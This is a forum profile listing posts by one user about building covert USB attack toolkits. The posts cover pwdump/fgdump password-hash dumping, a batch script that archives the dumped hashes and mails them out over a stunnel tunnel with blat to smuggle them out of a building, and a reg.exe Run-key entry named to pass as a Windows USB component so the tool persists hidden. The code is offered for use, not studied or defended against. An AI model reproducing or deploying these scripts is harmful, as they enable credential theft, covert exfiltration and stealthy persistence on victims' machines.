Jump to content

Joerg

Active Members
  • Posts

    305
  • Joined

  • Last visited

Everything posted by Joerg

  1. Emm, I tested pwdump(3/4/5/6) and fgdump, but if I call them in a batch it doesn't work. But if I use the cmd.exe to execute these programs, they work if they find a share. Is it a problem of my machine, a coding mistake or a program's bug? Joerg
  2. But if you'll have to smuggle the dumped informations out of a $building, it wouldn't be bad having a copy on a mailserver.
  3. I did it once, but later I realized that I'll have the dumped files twice. Edit: 1. Copy all files from the sbs folder (except for example sbs.exe) to the dump folder 2. Create a new send.bat file (like from the hacksaw) and use this code: @echo on :start SET emailto= SET emailfrom= SET password= SET subject=dump.%date%.%computername% rar.exe a dump.%date%.%computername%.rar -v1024k -vn .%date%.%computername%" stunnel-4.11.exe -install -quiet 2>nul net start stunnel 2>nul GOTO sendfiles :sendfiles for %%i in (dump.*.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -s %subject% -server 127.0.0.1:1099 GOTO cleanup :cleanup net stop stunnel 2>nul 2>nul stunnel-4.11.exe -uninstall -quiet 2>nul 2>nul del /q /f dump.*.r* GOTO end :end
  4. After some hours of bughunting I got the idea of including an errorlog for the toolpackages out there. I think this can help enormously to save time of checking the code. set error=%computername%.error.log echo %time% %date% %computername%>>"%error%" if exist "C:Windowscalc.exe" ( calc 1/0 ) else ( echo calc.exe doesn't exist! >>"%error%" ) Or you don't let happen mistakes ;)
  5. As I searched the web for extreme l33tstuff ;) I came across some old news which said that regedit can't handle REG_SZ entries with more than 255 characters. I tested it with following code and it worked. Details: http://www.reviewingit.com/index.php/content/view/28/2/ reg.exe add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v "Microsoft Windows Legacy USB Support " /t REG_SZ /d "%systemdrive%system32calc.exe" This will add an uberlong entry to the registry, try to search for that key with regedit now This is only a lame protection from being uncloaked, but I think for the most users this is enough ;) Greetings Joerg
  6. I'm currently developing my own collection of tools, so I looked to a tool which dumps nice and quietly files. So I tried fc. exe and it worked quiete fine, but there appears an icon in the systray. Is this normal or have I forgotton a switch? Joerg
×
×
  • Create New...